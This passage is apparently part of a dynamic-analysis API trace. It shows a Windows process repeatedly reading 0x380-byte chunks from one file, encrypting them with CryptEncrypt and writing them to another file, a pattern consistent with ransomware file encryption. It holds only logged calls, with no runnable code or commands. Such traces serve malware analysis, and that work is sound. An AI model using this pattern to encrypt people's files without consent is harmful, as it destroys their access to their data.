lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.105] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.105] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.105] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.105] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.105] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.105] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.105] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.105] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.105] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.106] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.106] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.106] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.106] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.106] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.106] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.106] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.106] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.106] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.106] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.106] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.106] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.106] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.106] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.106] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.107] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.107] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.107] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.107] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.107] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.107] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.107] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.107] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.107] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.107] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.107] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.107] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.107] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.108] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.108] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.108] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.108] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.108] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.108] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.108] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.108] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.108] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.108] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.108] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.108] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.108] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.108] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.109] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.109] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.109] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.109] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.109] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.109] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.109] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.109] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.109] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.109] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.109] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.109] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.109] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.109] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.110] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.110] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.110] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.110] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.110] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.110] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.110] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.110] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.110] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.110] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.110] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.110] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.110] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.110] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.111] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.111] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.111] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.111] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.111] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.111] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.111] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.111] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.112] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.112] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.112] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.112] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.112] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.112] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.112] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.112] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.112] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.112] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.112] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.112] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.112] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, 